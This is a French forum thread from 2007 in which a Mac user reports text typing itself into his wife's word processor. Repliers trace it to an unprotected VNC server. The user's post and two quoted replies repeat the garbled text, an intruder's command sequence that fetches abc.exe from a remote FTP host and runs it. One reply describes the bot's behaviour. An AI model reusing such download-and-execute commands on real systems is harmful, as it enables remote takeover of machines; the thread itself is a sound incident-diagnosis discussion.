message étrange apparaissant tout seul

Le
pmanet
en mode traitement de texte (neo office ou textedit), l'ordinateur de
mon épouse (iMac G4 15" macOSX 10.4.8) se met parfois à écrire tout
seul.
ça commence généralement comme ça :

(syste,root(`syste,"é`c,d:exe
c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit

del ij èuz:exe ènet stqrt shqredqccess èexit



j'ai éteint Airport, débranché le réseau, ça continue
il me semble reconnaitre des bouts de langage structuré, mais je ne vois
pas d'où ça peut venir.
elle n'a ni word ni Excel, mais plein de copines qui lui envoient toutes
les m possibles.
Ma seule piste est que depuis quelques temps, son disque de démarrage
était saturé de chez saturé, il est meme descendu à 1,6 MO de libre
(depuis, on a nettoyé)

des idées ?

--
Philippe Manet
Vidéos High-Tech et Jeu Vidéo
Téléchargements
Vos réponses Page 1 / 2
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
Nina Popravka
Le #2239611
On Tue, 27 Mar 2007 00:05:34 +0200, (manet) wrote:

(syste,root(`syste,"é`c,d:exe
c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit

del ij èuz:exe ènet stqrt shqredqccess èexit


Mouahhhhhhhhhhhhh je sens que je viens de trouver un autre nid à virus
:-)
Arrête ton serveur VNC.
--
Nina

patpro ~ patrick proniewski
Le #2239561
In article Nina Popravka wrote:

On Tue, 27 Mar 2007 00:05:34 +0200, (manet) wrote:

(syste,root(`syste,"é`c,d:exe
c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit

del ij èuz:exe ènet stqrt shqredqccess èexit


Mouahhhhhhhhhhhhh je sens que je viens de trouver un autre nid à virus
:-)
Arrête ton serveur VNC.


si ca apparaît même avec le réseau éteint c'est surement un message de
l'au-delà. Peut être un sys-admin dont le meurtre n'a jamais été élucidé
et qui revient te hanter ! :)

bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage

patpro

--
http://www.patpro.net/


Nina Popravka
Le #2239531
On Tue, 27 Mar 2007 06:52:50 +0100, patpro ~ patrick proniewski

si ca apparaît même avec le réseau éteint
Je t'accorde que c'est troublant...


bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage
kssssss... aucune curiosité ;->

--
Nina

Olivier Croquette
Le #2239511
manet wrote, On 27.03.2007 0:05 Uhr:
en mode traitement de texte (neo office ou textedit), l'ordinateur de
mon épouse (iMac G4 15" macOSX 10.4.8) se met parfois à écrire tout
seul.


http://groups.google.com/group/fr.comp.os.mac-os.x/msg/cc4d35b36f51de15
http://groups.google.com/group/fr.comp.os.mac-os.x/msg/e3b382a9181d9072

patpro ~ Patrick Proniewski
Le #2171921
In article Nina Popravka wrote:

On Tue, 27 Mar 2007 06:52:50 +0100, patpro ~ patrick proniewski

si ca apparaît même avec le réseau éteint
Je t'accorde que c'est troublant...


bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage
kssssss... aucune curiosité ;->



j'ai la curiosité préemptive : ce genre de gag est bloqué par mon
firewall, et/ou mes réflexes d'admin ;)

Sinon c'est sûr que j'aurai vite fait de déballer l'arsenal avant le
formatage. Un peu de forensic fait jamais de mal (lsof, netstat, ktrace,
lecture des logs, ...) mais rien avant d'avoir coupé l'accès internet
(et non pas le réseau).

patpro

--
http://www.patpro.net/


Nina Popravka
Le #2171221
On Tue, 27 Mar 2007 09:27:30 +0200, patpro ~ Patrick Proniewski

Sinon c'est sûr que j'aurai vite fait de déballer l'arsenal avant le
formatage. Un peu de forensic fait jamais de mal (lsof, netstat, ktrace,
lecture des logs, ...) mais rien avant d'avoir coupé l'accès internet
(et non pas le réseau).


A part ça, le abc.exe est le même que celui qui était sur le ftp de
l'alien de Riguard, je viens de vérifier les empreintes MD5.
Celui la, je l'avais testé.
Il inscrit 3 clés de registre (une pour démarrer, et 2 exceptions de
firewall spécialement pour lui), va s'inscrire sur un merdier IRC, y
prend ses ordres, et commence à scanner les plages qu'on lui a dit,
direction port 5900.
Il a même la gentillesse de démarrer le firewall de xp (net start
sharedaccess)
Tout ça nous dit pas par quel phénomène surréaliste il apparaît sur
une machine non connectée. Ni d'ailleurs comment les commandes
apparaissent dans un traitement de texte.
--
Nina

tagada
Le #2170481
manet
des idées ?


Faut vite mettre un mot de passe à ton VNC ! il est ouvert à tous les
vents !!!

Patrick

Olivier Croquette
Le #2239311
Patrick B wrote, On 27.03.2007 14:50 Uhr:

Faut vite mettre un mot de passe à ton VNC ! il est ouvert à tous les
vents !!!


C'est le minimum. A ça on peut ajouter:

- lancer le serveur à la main seulement quand c'est nécessaire

- changer le port sur lequel il écoute

pmanet
Le #2239301
Nina Popravka wrote:

Arrête ton serveur VNC.


bon, on va essayer

--
Philippe Manet

Nina Popravka
Le #2239291
On Tue, 27 Mar 2007 23:50:43 +0200, (manet) wrote:

Arrête ton serveur VNC.
bon, on va essayer



Ah ouais tiens, on n'a plus la vue panoramique sur l'écran de la
bécane de la certainement très charmante Anne.
On progresse... ;->
--
Nina


Publicité
Poster une réponse
Anonyme